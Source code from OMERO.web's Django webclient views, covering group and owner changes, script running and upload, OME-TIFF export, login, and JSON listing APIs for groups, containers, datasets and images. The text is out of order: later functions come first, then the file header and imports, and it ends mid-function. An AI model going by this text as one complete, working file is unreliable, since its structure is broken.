conn.SERVICE_OPTS.setOmeroGroup(group_id)
container_id = conn.createContainer(new_container_type, new_container_name)
# No new container, check if target is specified
if container_id is None:
# E.g. "dataset-234"
target_id = request.POST.get("target_id", None)
container_id = target_id is not None and target_id.split("-")[1] or None
dtypes = ["Project", "Dataset", "Image", "Screen", "Plate"]
for dtype in dtypes:
# Get all requested objects of this type
oids = request.POST.get(dtype, None)
if oids is not None:
obj_ids = [int(oid) for oid in oids.split(",")]
# TODO Doesn't the filesets only apply to images?
# if 'filesets' are specified, make sure we move ALL Fileset Images
fsIds = request.POST.getlist("fileset")
if len(fsIds) > 0:
# If a dataset is being moved and there is a split fileset
# then those images need to go somewhere in the new
if dtype == "Dataset":
conn.regroupFilesets(dsIds=obj_ids, fsIds=fsIds)
else:
for fs in conn.getObjects("Fileset", fsIds):
obj_ids.extend([i.id for i in fs.copyImages()])
obj_ids = list(set(obj_ids)) # remove duplicates
logger.debug("chgrp to group:%s %s-%s" % (group_id, dtype, obj_ids))
handle = conn.chgrpObjects(dtype, obj_ids, group_id, container_id)
jobId = str(handle)
request.session["callback"][jobId] = {
"job_type": "chgrp",
"group": group.getName(),
"to_group_id": group_id,
"dtype": dtype,
"obj_ids": obj_ids,
"job_name": "Change group",
"start_time": datetime.datetime.now(),
"status": "in progress",
}
request.session.modified = True
# Update contains a list of images/containers that need to be
# updated.
project_ids = request.POST.get("Project", [])
dataset_ids = request.POST.get("Dataset", [])
image_ids = request.POST.get("Image", [])
screen_ids = request.POST.get("Screen", [])
plate_ids = request.POST.get("Plate", [])
if project_ids:
project_ids = [long(x) for x in project_ids.split(",")]
if dataset_ids:
dataset_ids = [long(x) for x in dataset_ids.split(",")]
if image_ids:
image_ids = [long(x) for x in image_ids.split(",")]
if screen_ids:
screen_ids = [long(x) for x in screen_ids.split(",")]
if plate_ids:
plate_ids = [long(x) for x in plate_ids.split(",")]
# TODO Change this user_id to be an experimenter_id in the request as it
# is possible that a user is chgrping data from another user so it is
# that users orphaned that will need updating. Or maybe all orphaned
# directories could potentially need updating?
# Create a list of objects that have been changed by this operation. This
# can be used by the client to visually update.
update = getAllObjects(
conn,
project_ids,
dataset_ids,
image_ids,
screen_ids,
plate_ids,
request.session.get("user_id"),
)
# return HttpResponse("OK")
return JsonResponse({"update": update})
@login_required()
def chown(request, conn=None, **kwargs):
"""
Moves data to a new owner, using the chown queue.
Handles submission of chown form: all data in POST.
Adds the callback handle to the request.session['callback']['jobId']
"""
if not request.method == "POST":
return JsonResponse({"Error": "Need to POST to chown"}, status=405)
# Get the target owner_id
owner_id = getIntOrDefault(request, "owner_id", None)
if owner_id is None:
return JsonResponse({"Error": "chown: No owner_id specified"})
owner_id = int(owner_id)
exp = conn.getObject("Experimenter", owner_id)
if exp is None:
return JsonResponse({"Error": "chown: Experimenter not found" % owner_id})
dtypes = ["Project", "Dataset", "Image", "Screen", "Plate"]
jobIds = []
for dtype in dtypes:
# Get all requested objects of this type
oids = request.POST.get(dtype, None)
if oids is not None:
obj_ids = [int(oid) for oid in oids.split(",")]
logger.debug("chown to owner:%s %s-%s" % (owner_id, dtype, obj_ids))
handle = conn.chownObjects(dtype, obj_ids, owner_id)
jobId = str(handle)
jobIds.append(jobId)
request.session["callback"][jobId] = {
"job_type": "chown",
"owner": exp.getFullName(),
"to_owner_id": owner_id,
"dtype": dtype,
"obj_ids": obj_ids,
"job_name": "Change owner",
"start_time": datetime.datetime.now(),
"status": "in progress",
}
request.session.modified = True
return JsonResponse({"jobIds": jobIds})
@login_required(setGroupContext=True)
def script_run(request, scriptId, conn=None, **kwargs):
"""
Runs a script using values in a POST
"""
scriptService = conn.getScriptService()
inputMap = {}
sId = long(scriptId)
try:
params = scriptService.getParams(sId)
except Exception as x:
if x.message and x.message.startswith("No processor available"):
# Delegate to run_script() for handling 'No processor available'
rsp = run_script(request, conn, sId, inputMap, scriptName="Script")
return JsonResponse(rsp)
else:
raise
params = scriptService.getParams(sId)
scriptName = params.name.replace("_", " ").replace(".py", "")
logger.debug("Script: run with request.POST: %s" % request.POST)
# upload new file
fileupload = (
"file_annotation" in request.FILES and request.FILES["file_annotation"] or None
)
fileAnnId = None
if fileupload is not None and fileupload != "":
manager = BaseContainer(conn)
fileAnnId = manager.createFileAnnotations(fileupload, [])
for key, param in params.inputs.items():
prototype = param.prototype
pclass = prototype.__class__
if key == "File_Annotation" and fileAnnId is not None:
inputMap[key] = pclass(str(fileAnnId))
continue
# handle bool separately, since unchecked checkbox will not be in
# request.POST
if pclass == omero.rtypes.RBoolI:
value = key in request.POST
inputMap[key] = pclass(value)
continue
if pclass.__name__ == "RMapI":
keyName = "%s_key0" % key
valueName = "%s_value0" % key
row = 0
paramMap = {}
while keyName in request.POST:
# the key and value don't have any data-type defined by
# scripts - just use string
k = str(request.POST[keyName])
v = request.POST[valueName]
if len(k) > 0 and len(v) > 0:
paramMap[str(k)] = v
row += 1
keyName = "%s_key%d" % (key, row)
valueName = "%s_value%d" % (key, row)
if len(paramMap) > 0:
inputMap[key] = wrap(paramMap)
continue
if key in request.POST:
if pclass == omero.rtypes.RListI:
values = request.POST.getlist(key)
if len(values) == 0:
continue
if len(values) == 1: # process comma-separated list
if len(values[0]) == 0:
continue
values = values[0].split(",")
# try to determine 'type' of values in our list
listClass = omero.rtypes.RStringI
pval = prototype.val # list
# check if a value type has been set (first item of prototype
# list)
if len(pval) > 0:
listClass = pval[0].__class__
if listClass == int(1).__class__:
listClass = omero.rtypes.rint
if listClass == long(1).__class__:
listClass = omero.rtypes.rlong
# construct our list, using appropriate 'type'
valueList = []
for v in values:
try:
# RStringI() will encode any unicode
obj = listClass(v.strip())
except Exception:
logger.debug("Invalid entry for '%s' : %s" % (key, v))
continue
if isinstance(obj, omero.model.IObject):
valueList.append(omero.rtypes.robject(obj))
else:
valueList.append(obj)
inputMap[key] = omero.rtypes.rlist(valueList)
# Handle other rtypes: String, Long, Int etc.
else:
value = request.POST[key]
if len(value) == 0:
continue
try:
inputMap[key] = pclass(value)
except Exception:
logger.debug("Invalid entry for '%s' : %s" % (key, value))
continue
# If we have objects specified via 'IDs' and 'DataType', try to pick
# correct group
if "IDs" in inputMap and "Data_Type" in inputMap:
gid = conn.SERVICE_OPTS.getOmeroGroup()
conn.SERVICE_OPTS.setOmeroGroup("-1")
try:
firstObj = conn.getObject(
inputMap["Data_Type"].val, unwrap(inputMap["IDs"])[0]
)
newGid = firstObj.getDetails().group.id.val
conn.SERVICE_OPTS.setOmeroGroup(newGid)
except Exception:
logger.debug(traceback.format_exc())
# if inputMap values not as expected or firstObj is None
conn.SERVICE_OPTS.setOmeroGroup(gid)
try:
# Try/except in case inputs are not serializable, e.g. unicode
logger.debug("Running script %s with " "params %s" % (scriptName, inputMap))
except Exception:
pass
rsp = run_script(request, conn, sId, inputMap, scriptName)
return JsonResponse(rsp)
@login_required(isAdmin=True)
@render_response()
def script_upload(request, conn=None, **kwargs):
"""Script upload UI"""
if request.method != "POST":
return {"template": "webclient/scripts/upload_script.html"}
# Get script path, name and text
script_path = request.POST.get("script_path")
script_file = request.FILES["script_file"]
script_file.seek(0)
script_text = script_file.read().decode("utf-8")
if not script_path.endswith("/"):
script_path = script_path + "/"
script_path = script_path + script_file.name
# If script exists, replace. Otherwise upload
scriptService = conn.getScriptService()
script_id = scriptService.getScriptID(script_path)
try:
if script_id > 0:
orig_file = OriginalFileI(script_id, False)
scriptService.editScript(orig_file, script_text)
message = "Script Replaced: %s" % script_file.name
else:
script_id = scriptService.uploadOfficialScript(script_path, script_text)
message = "Script Uploaded: %s" % script_file.name
except omero.ValidationException as ex:
message = str(ex)
return {"Message": message, "script_id": script_id}
@require_POST
@login_required()
def ome_tiff_script(request, imageId, conn=None, **kwargs):
"""
Uses the scripting service (Batch Image Export script) to generate
OME-TIFF for an image and attach this as a file annotation to the image.
Script will show up in the 'Activities' for users to monitor and download
result etc.
"""
scriptService = conn.getScriptService()
sId = scriptService.getScriptID("/omero/export_scripts/Batch_Image_Export.py")
image = conn.getObject("Image", imageId)
if image is not None:
gid = image.getDetails().group.id.val
conn.SERVICE_OPTS.setOmeroGroup(gid)
imageIds = [long(imageId)]
inputMap = {
"Data_Type": wrap("Image"),
"IDs": rlist([rlong(id) for id in imageIds]),
}
inputMap["Format"] = wrap("OME-TIFF")
rsp = run_script(request, conn, sId, inputMap, scriptName="Create OME-TIFF")
return JsonResponse(rsp)
def run_script(request, conn, sId, inputMap, scriptName="Script"):
"""
Starts running a script, adding details to the request.session so that it
shows up in the webclient Activities panel and results are available there
etc.
"""
request.session.modified = True
scriptService = conn.getScriptService()
try:
handle = scriptService.runScript(sId, inputMap, None, conn.SERVICE_OPTS)
# E.g. ProcessCallback/4ab13b23-22c9-4b5f-9318-40f9a1acc4e9 -t:tcp -h 10.37.129.2 -p 53154:tcp -h 10.211.55.2 -p 53154:tcp -h 10.12.1.230 -p 53154 # noqa
jobId = str(handle)
status = "in progress"
request.session["callback"][jobId] = {
"job_type": "script",
"job_name": scriptName,
"start_time": datetime.datetime.now(),
"status": status,
}
request.session.modified = True
except Exception as x:
jobId = str(time()) # E.g. 1312803670.6076391
# handle python 2 or 3 errors
message = x.message if hasattr(x, "message") else (x.args[0] if x.args else "")
if message and message.startswith("No processor available"):
# omero.ResourceError
logger.info(traceback.format_exc())
error = "No Processor Available"
status = "no processor available"
message = "" # template displays message and link
else:
logger.error(traceback.format_exc())
error = traceback.format_exc()
status = "failed"
message = x.message
# save the error to http session, for display in 'Activities' window
request.session["callback"][jobId] = {
"job_type": "script",
"job_name": scriptName,
"start_time": datetime.datetime.now(),
"status": status,
"Message": message,
"error": error,
}
return {"status": status, "error": error}
return {"jobId": jobId, "status": status}
@login_required()
@render_response()
def ome_tiff_info(request, imageId, conn=None, **kwargs):
"""
Query to see if we have an OME-TIFF attached to the image (assume only 1,
since Batch Image Export will delete old ones)
"""
# Any existing OME-TIFF will appear in list
links = list(
conn.getAnnotationLinks(
"Image", [imageId], ns=omero.constants.namespaces.NSOMETIFF
)
)
rv = {}
if len(links) > 0:
# use highest ID === most recent
links.sort(key=lambda x: x.getId(), reverse=True)
annlink = links[0]
created = annlink.creationEventDate()
annId = annlink.getChild().getId()
from omeroweb.webgateway.templatetags.common_filters import ago
download = reverse("download_annotation", args=[annId])
rv = {
"created": str(created),
"ago": ago(created),
"id": annId,
"download": download,
}
return rv # will get returned as json by default
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2008-2020 University of Dundee & Open Microscopy Environment.
# All rights reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
""" A view functions is simply a Python function that takes a Web request and
returns a Web response. This response can be the HTML contents of a Web page,
or a redirect, or the 404 and 500 error, or an XML document, or an image...
or anything."""
import copy
import os
import datetime
import Ice
from Ice import Exception as IceException
import logging
import traceback
import json
import re
import sys
import warnings
from past.builtins import unicode
from future.utils import bytes_to_native_str
from django.utils.http import is_safe_url
from time import time
from omeroweb.version import omeroweb_buildyear as build_year
from omeroweb.version import omeroweb_version as omero_version
import omero
import omero.scripts
from omero.rtypes import wrap, unwrap, rlong, rlist
from omero.gateway.utils import toBoolean
from django.conf import settings
from django.template import loader as template_loader
from django.http import (
Http404,
HttpResponse,
HttpResponseRedirect,
JsonResponse,
HttpResponseForbidden,
)
from django.http import HttpResponseServerError, HttpResponseBadRequest
from django.utils.http import urlencode
from django.core.urlresolvers import reverse, NoReverseMatch
from django.utils.encoding import smart_str
from django.views.decorators.cache import never_cache
from django.views.decorators.http import require_POST
from django.shortcuts import render
from omeroweb.webclient.webclient_utils import _formatReport, _purgeCallback
from .forms import GlobalSearchForm, ContainerForm
from .forms import ShareForm
from .forms import ContainerNameForm, ContainerDescriptionForm
from .forms import CommentAnnotationForm, TagsAnnotationForm
from .forms import MetadataFilterForm, MetadataDetectorForm
from .forms import MetadataChannelForm, MetadataEnvironmentForm
from .forms import MetadataObjectiveForm, MetadataObjectiveSettingsForm
from .forms import MetadataStageLabelForm, MetadataLightSourceForm
from .forms import MetadataDichroicForm, MetadataMicroscopeForm
from .forms import FilesAnnotationForm, WellIndexForm, NewTagsAnnotationFormSet
from .controller.container import BaseContainer
from .controller.history import BaseCalendar
from .controller.search import BaseSearch
from .controller.share import BaseShare
from omeroweb.webadmin.forms import LoginForm
from omeroweb.webgateway import views as webgateway_views
from omeroweb.webgateway.marshal import graphResponseMarshal
from omeroweb.webgateway.util import get_longs as webgateway_get_longs
from omeroweb.feedback.views import handlerInternalError
from omeroweb.webclient.decorators import login_required
from omeroweb.webclient.decorators import render_response
from omeroweb.webclient.show import (
Show,
IncorrectMenuError,
paths_to_object,
paths_to_tag,
)
from omeroweb.decorators import (
ConnCleaningHttpResponse,
parse_url,
TableClosingHttpResponse,
)
from omeroweb.webgateway.util import getIntOrDefault
from omero.model import (
AnnotationAnnotationLinkI,
DatasetI,
DatasetImageLinkI,
ExperimenterI,
ImageI,
OriginalFileI,
PlateI,
ProjectI,
ProjectDatasetLinkI,
ScreenI,
ScreenPlateLinkI,
TagAnnotationI,
)
from omero import ApiUsageException, ServerError, CmdError
from omeroweb.webgateway.views import LoginView
from . import tree
try:
import long
except ImportError:
long = int
logger = logging.getLogger(__name__)
logger.info("INIT '%s'" % os.getpid())
# We want to allow a higher default limit for annotations so we can load
# all the annotations expected for a PAGE of images
ANNOTATIONS_LIMIT = settings.PAGE * 100
def get_long_or_default(request, name, default):
"""
Retrieves a parameter from the request. If the parameter is not present
the default is returned
This does not catch exceptions as it makes sense to throw exceptions if
the arguments provided do not pass basic type validation
"""
val = None
val_raw = request.GET.get(name, default)
if val_raw is not None:
val = long(val_raw)
return val
def get_list(request, name):
val = request.GET.getlist(name)
return [i for i in val if i != ""]
def get_longs(request, name):
warnings.warn(
"Deprecated. Use omeroweb.webgateway.util.get_longs()", DeprecationWarning
)
return webgateway_get_longs(request, name)
def get_bool_or_default(request, name, default):
"""
Retrieves a parameter from the request. If the parameter is not present
the default is returned
This does not catch exceptions as it makes sense to throw exceptions if
the arguments provided do not pass basic type validation
"""
return toBoolean(request.GET.get(name, default))
def validate_redirect_url(url):
"""
Returns a URL is safe to redirect to.
If url is a different host, not in settings.REDIRECT_ALLOWED_HOSTS
we return webclient index URL.
"""
if not is_safe_url(url, allowed_hosts=settings.REDIRECT_ALLOWED_HOSTS):
url = reverse("webindex")
return url
##############################################################################
# custom index page
@never_cache
@render_response()
def custom_index(request, conn=None, **kwargs):
context = {"version": omero_version, "build_year": build_year}
if settings.INDEX_TEMPLATE is not None:
try:
template_loader.get_template(settings.INDEX_TEMPLATE)
context["template"] = settings.INDEX_TEMPLATE
except Exception:
context["template"] = "webclient/index.html"
context["error"] = traceback.format_exception(*sys.exc_info())[-1]
else:
context["template"] = "webclient/index.html"
return context
##############################################################################
# views
class WebclientLoginView(LoginView):
"""
Webclient Login - Customises the superclass LoginView
for webclient. Also can be used by other Apps to log in to OMERO. Uses
the 'server' id from request to lookup the server-id (index), host and
port from settings. E.g. "localhost", 4064. Stores these details, along
with username, password etc in the request.session. Resets other data
parameters in the request.session. Tries to get connection to OMERO and
if this works, then we are redirected to the 'index' page or url
specified in REQUEST. If we can't connect, the login page is returned
with appropriate error messages.
"""
template = "webclient/login.html"
useragent = "OMERO.web"
def get(self, request):
"""
GET simply returns the login page
"""
return self.handle_not_logged_in(request)
def handle_logged_in(self, request, conn, connector):
"""
We override this to provide webclient-specific functionality
such as cleaning up any previous sessions (if user didn't logout)
and redirect to specified url or webclient index page.
"""
# webclient has various state that needs cleaning up...
# if 'active_group' remains in session from previous
# login, check it's valid for this user
# NB: we do this for public users in @login_required.get_connection()
if request.session.get("active_group"):
if (
request.session.get("active_group")
not in conn.getEventContext().memberOfGroups
):
del request.session["active_group"]
if request.session.get("user_id"):
# always want to revert to logged-in user
del request.session["user_id"]
if request.session.get("server_settings"):
# always clean when logging in
del request.session["server_settings"]
# do we ned to display server version ?
# server_version = conn.getServerVersion()
if request.POST.get("noredirect"):
return HttpResponse("OK")
url = request.GET.get("url")
if url is None or len(url) == 0:
try:
url = parse_url(settings.LOGIN_REDIRECT)
except Exception:
url = reverse("webindex")
else:
url = validate_redirect_url(url)
return HttpResponseRedirect(url)
def handle_not_logged_in(self, request, error=None, form=None):
"""
Returns a response for failed login.
Reason for failure may be due to server 'error' or because
of form validation errors.
@param request: http request
@param error: Error message
@param form: Instance of Login Form, populated with data
"""
if form is None:
server_id = request.GET.get("server", request.POST.get("server"))
if server_id is not None:
initial = {"server": unicode(server_id)}
form = LoginForm(initial=initial)
else:
form = LoginForm()
context = {
"version": omero_version,
"build_year": build_year,
"error": error,
"form": form,
}
url = request.GET.get("url")
if url is not None and len(url) != 0:
context["url"] = urlencode({"url": url})
if hasattr(settings, "LOGIN_LOGO"):
context["LOGIN_LOGO"] = settings.LOGIN_LOGO
if settings.PUBLIC_ENABLED:
redirect = reverse("webindex")
if settings.PUBLIC_URL_FILTER.search(redirect):
context["public_enabled"] = True
context["public_login_redirect"] = redirect
context["show_download_links"] = settings.SHOW_CLIENT_DOWNLOADS
if settings.SHOW_CLIENT_DOWNLOADS:
ver = re.match(
(
r"(?P<major>\d+)\."
r"(?P<minor>\d+)\."
r"(?P<patch>\d+\.?)?"
r"(?P<dev>(dev|a|b|rc)\d+)?.*"
),
omero_version,
)
client_download_tag_re = "^v%s\\.%s\\.[^-]+$" % (
ver.group("major"),
ver.group("minor"),
)
context["client_download_tag_re"] = client_download_tag_re
context["client_download_repo"] = settings.CLIENT_DOWNLOAD_GITHUB_REPO
return render(request, self.template, context)
@login_required(ignore_login_fail=True)
def keepalive_ping(request, conn=None, **kwargs):
""" Keeps the OMERO session alive by pinging the server """
# login_required handles ping, timeout etc, so we don't need to do
# anything else
return HttpResponse("OK")
@login_required()
def change_active_group(request, conn=None, url=None, **kwargs):
"""
Simply changes the request.session['active_group'] which is then used by
the @login_required decorator to configure conn for any group-based
queries.
Finally this redirects to the 'url'.
"""
switch_active_group(request)
url = url or reverse("webindex")
url = validate_redirect_url(url)
return HttpResponseRedirect(url)
def switch_active_group(request, active_group=None):
"""
Simply changes the request.session['active_group'] which is then used by
the @login_required decorator to configure conn for any group-based
queries.
"""
if active_group is None:
active_group = request.GET.get("active_group")
active_group = int(active_group)
if (
"active_group" not in request.session
or active_group != request.session["active_group"]
):
request.session.modified = True
request.session["active_group"] = active_group
def fake_experimenter(request, default_name="All members"):
"""
Marshal faked experimenter when id is -1
Load omero.client.ui.menu.dropdown.everyone.label as username
"""
label = (
request.session.get("server_settings")
.get("ui", {})
.get("menu", {})
.get("dropdown", {})
.get("everyone", {})
.get("label", default_name)
)
return {
"id": -1,
"omeName": label,
"firstName": label,
"lastName": "",
}
@login_required(login_redirect="webindex")
def logout(request, conn=None, **kwargs):
"""
Logout of the session and redirects to the homepage (will redirect to
login first)
"""
if request.method == "POST":
try:
try:
conn.close()
except Exception:
logger.error("Exception during logout.", exc_info=True)
finally:
request.session.flush()
return HttpResponseRedirect(reverse(settings.LOGIN_VIEW))
else:
context = {"url": reverse("weblogout"), "submit": "Do you want to log out?"}
template = "webgateway/base/includes/post_form.html"
return render(request, template, context)
###########################################################################
def _load_template(request, menu, conn=None, url=None, **kwargs):
"""
This view handles most of the top-level pages, as specified by 'menu' E.g.
userdata, usertags, history, search etc.
Query string 'path' that specifies an object to display in the data tree
is parsed.
We also prepare the list of users in the current group, for the
switch-user form. Change-group form is also prepared.
"""
request.session.modified = True
template = kwargs.get("template", None)
if template is None:
if menu == "userdata":
template = "webclient/data/containers.html"
elif menu == "usertags":
template = "webclient/data/containers.html"
else:
# E.g. search/search.html
template = "webclient/%s/%s.html" % (menu, menu)
# tree support
show = kwargs.get("show", Show(conn, request, menu))
# Constructor does no loading. Show.first_selected must be called first
# in order to set up our initial state correctly.
try:
first_sel = show.first_selected
except IncorrectMenuError as e:
return HttpResponseRedirect(e.uri)
# We get the owner of the top level object, E.g. Project
# Actual api_paths_to_object() is retrieved by jsTree once loaded
initially_open_owner = show.initially_open_owner
# If we failed to find 'show'...
if request.GET.get("show", None) is not None and first_sel is None:
# and we're logged in as PUBLIC user...
if (
settings.PUBLIC_ENABLED
and settings.PUBLIC_USER == conn.getUser().getOmeName()
):
# this is likely a regular user who needs to log in as themselves.
# Login then redirect to current url
return HttpResponseRedirect("%s?url=%s" % (reverse("weblogin"), url))
# need to be sure that tree will be correct omero.group
if first_sel is not None:
switch_active_group(request, first_sel.details.group.id.val)
# search support
init = {}
global_search_form = GlobalSearchForm(data=request.GET.copy())
if menu == "search":
if global_search_form.is_valid():
init["query"] = global_search_form.cleaned_data["search_query"]
# get url without request string - used to refresh page after switch
# user/group etc
url = kwargs.get("load_template_url", None)
if url is None:
url = reverse(viewname="load_template", args=[menu])
# validate experimenter is in the active group
active_group = request.session.get("active_group") or conn.getEventContext().groupId
# prepare members of group...
leaders, members = conn.getObject("ExperimenterGroup", active_group).groupSummary()
userIds = [u.id for u in leaders]
userIds.extend([u.id for u in members])
# check any change in experimenter...
user_id = request.GET.get("experimenter")
if initially_open_owner is not None:
if request.session.get("user_id", None) != -1:
# if we're not already showing 'All Members'...
user_id = initially_open_owner
try:
user_id = long(user_id)
except Exception:
user_id = None
# check if user_id is in a currnt group
if user_id is not None:
if (
user_id
not in (
set(map(lambda x: x.id, leaders)) | set(map(lambda x: x.id, members))
)
and user_id != -1
):
# All users in group is allowed
user_id = None
if user_id is None:
# ... or check that current user is valid in active group
user_id = request.session.get("user_id", None)
if user_id is None or int(user_id) not in userIds:
if user_id != -1: # All users in group is allowed
user_id = conn.getEventContext().userId
request.session["user_id"] = user_id
myGroups = list(conn.getGroupsMemberOf())
myGroups.sort(key=lambda x: x.getName().lower())
groups = myGroups
new_container_form = ContainerForm()
# colleagues required for search.html page only.
myColleagues = {}
if menu == "search":
for g in groups:
g.loadLeadersAndMembers()
for c in g.leaders + g.colleagues:
myColleagues[c.id] = c
myColleagues = list(myColleagues.values())
myColleagues.sort(key=lambda x: x.getLastName().lower())
context = {
"menu": menu,
"init": init,
"myGroups": myGroups,
"new_container_form": new_container_form,
"global_search_form": global_search_form,
}
context["groups"] = groups
context["myColleagues"] = myColleagues
context["active_group"] = conn.getObject("ExperimenterGroup", long(active_group))
context["active_user"] = conn.getObject("Experimenter", long(user_id))
context["initially_select"] = show.initially_select
context["initially_open"] = show.initially_open
context["isLeader"] = conn.isLeader()
context["current_url"] = url
context["page_size"] = settings.PAGE
context["template"] = template
context["thumbnails_batch"] = settings.THUMBNAILS_BATCH
context["current_admin_privileges"] = conn.getCurrentAdminPrivileges()
context["leader_of_groups"] = conn.getEventContext().leaderOfGroups
context["member_of_groups"] = conn.getEventContext().memberOfGroups
return context
@login_required()
@render_response()
def load_template(request, menu, conn=None, url=None, **kwargs):
return _load_template(request=request, menu=menu, conn=conn, url=url, **kwargs)
@login_required()
@render_response()
def group_user_content(request, url=None, conn=None, **kwargs):
"""
Loads html content of the Groups/Users drop-down menu on main webclient
pages.
Url should be supplied in request, as target for redirect after switching
group.
"""
myGroups = list(conn.getGroupsMemberOf())
myGroups.sort(key=lambda x: x.getName().lower())
if conn.isAdmin(): # Admin can see all groups
system_groups = [
conn.getAdminService().getSecurityRoles().userGroupId,
conn.getAdminService().getSecurityRoles().guestGroupId,
]
groups = conn.getObjects("ExperimenterGroup", opts={"load_experimenters": True})
groups = [g for g in groups if g.getId() not in system_groups]
groups.sort(key=lambda x: x.getName().lower())
else:
groups = myGroups
for g in groups:
g.loadLeadersAndMembers() # load leaders / members
context = {
"template": "webclient/base/includes/group_user_content.html",
"current_url": url,
"groups": groups,
"myGroups": myGroups,
}
return context
@login_required()
def api_group_list(request, conn=None, **kwargs):
# Get parameters
try:
page = get_long_or_default(request, "page", 1)
limit = get_long_or_default(request, "limit", settings.PAGE)
member_id = get_long_or_default(request, "member", -1)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
try:
# Get the groups
groups = tree.marshal_groups(
conn=conn, member_id=member_id, page=page, limit=limit
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"groups": groups})
@login_required()
def api_experimenter_detail(request, experimenter_id, conn=None, **kwargs):
# Validate parameter
try:
experimenter_id = long(experimenter_id)
except ValueError:
return HttpResponseBadRequest("Invalid experimenter id")
try:
# Get the experimenter
if experimenter_id < 0:
experimenter = fake_experimenter(request)
else:
# Get the experimenter
experimenter = tree.marshal_experimenter(
conn=conn, experimenter_id=experimenter_id
)
if experimenter is None:
raise Http404("No Experimenter found with ID %s" % experimenter_id)
return JsonResponse({"experimenter": experimenter})
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
@login_required()
def api_container_list(request, conn=None, **kwargs):
# Get parameters
try:
page = get_long_or_default(request, "page", 1)
limit = get_long_or_default(request, "limit", settings.PAGE)
group_id = get_long_or_default(request, "group", -1)
experimenter_id = get_long_or_default(request, "id", -1)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
# While this interface does support paging, it does so in a
# very odd way. The results per page is enforced per query so this
# will actually get the limit for projects, datasets (without
# parents), screens and plates (without parents). This is fine for
# the first page, but the second page may not be what is expected.
if not conn.isValidGroup(group_id):
return HttpResponseForbidden("Not a member of Group: %s" % group_id)
r = dict()
try:
# Get the projects
r["projects"] = tree.marshal_projects(
conn=conn,
group_id=group_id,
experimenter_id=experimenter_id,
page=page,
limit=limit,
)
# Get the orphaned datasets (without project parents)
r["datasets"] = tree.marshal_datasets(
conn=conn,
orphaned=True,
group_id=group_id,
experimenter_id=experimenter_id,
page=page,
limit=limit,
)
# Get the screens for the current user
r["screens"] = tree.marshal_screens(
conn=conn,
group_id=group_id,
experimenter_id=experimenter_id,
page=page,
limit=limit,
)
# Get the orphaned plates (without project parents)
r["plates"] = tree.marshal_plates(
conn=conn,
orphaned=True,
group_id=group_id,
experimenter_id=experimenter_id,
page=page,
limit=limit,
)
# Get the orphaned images container
try:
orph_t = request.session["server_settings"]["ui"]["tree"]["orphans"]
except Exception:
orph_t = {"enabled": True}
if (
conn.isAdmin()
or conn.isLeader(gid=request.session.get("active_group"))
or experimenter_id == conn.getUserId()
or orph_t.get("enabled", True)
):
orphaned = tree.marshal_orphaned(
conn=conn,
group_id=group_id,
experimenter_id=experimenter_id,
page=page,
limit=limit,
)
orphaned["name"] = orph_t.get("name", "Orphaned Images")
r["orphaned"] = orphaned
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse(r)
@login_required()
def api_dataset_list(request, conn=None, **kwargs):
# Get parameters
try:
page = get_long_or_default(request, "page", 1)
limit = get_long_or_default(request, "limit", settings.PAGE)
group_id = get_long_or_default(request, "group", -1)
project_id = get_long_or_default(request, "id", None)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
if not conn.isValidGroup(group_id):
return HttpResponseForbidden("Not a member of Group: %s" % group_id)
try:
# Get the datasets
datasets = tree.marshal_datasets(
conn=conn, project_id=project_id, group_id=group_id, page=page, limit=limit
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"datasets": datasets})
@login_required()
def api_image_list(request, conn=None, **kwargs):
"""Get a list of images
Specifiying dataset_id will return only images in that dataset
Specifying experimenter_id will return orpahned images for that
user
The orphaned images will include images which belong to the user
but are not in any dataset belonging to the user
Currently specifying both, experimenter_id will be ignored
"""
# Get parameters
try:
page = get_long_or_default(request, "page", 1)
limit = get_long_or_default(request, "limit", settings.PAGE)
group_id = get_long_or_default(request, "group", -1)
dataset_id = get_long_or_default(request, "id", None)
orphaned = get_bool_or_default(request, "orphaned", False)
load_pixels = get_bool_or_default(request, "sizeXYZ", False)
thumb_version = get_bool_or_default(request, "thumbVersion", False)
date = get_bool_or_default(request, "date", False)
experimenter_id = get_long_or_default(request, "experimenter_id", -1)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
if not conn.isValidGroup(group_id):
return HttpResponseForbidden("Not a member of Group: %s" % group_id)
# Share ID is in kwargs from api/share_images/<id>/ which will create
# a share connection in @login_required.
# We don't support ?share_id in query string since this would allow a
# share connection to be created for ALL urls, instead of just this one.
share_id = "share_id" in kwargs and long(kwargs["share_id"]) or None
try:
# Get the images
images = tree.marshal_images(
conn=conn,
orphaned=orphaned,
experimenter_id=experimenter_id,
dataset_id=dataset_id,
share_id=share_id,
load_pixels=load_pixels,
group_id=group_id,
page=page,
date=date,
thumb_version=thumb_version,
limit=limit,
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"images": images})
@login_required()
def api_plate_list(request, conn=None, **kwargs):
# Get parameters
try:
page = get_long_or_default(request, "page", 1)
limit = get_long_or_default(request, "limit", settings.PAGE)
group_id = get_long_or_default(request, "group", -1)
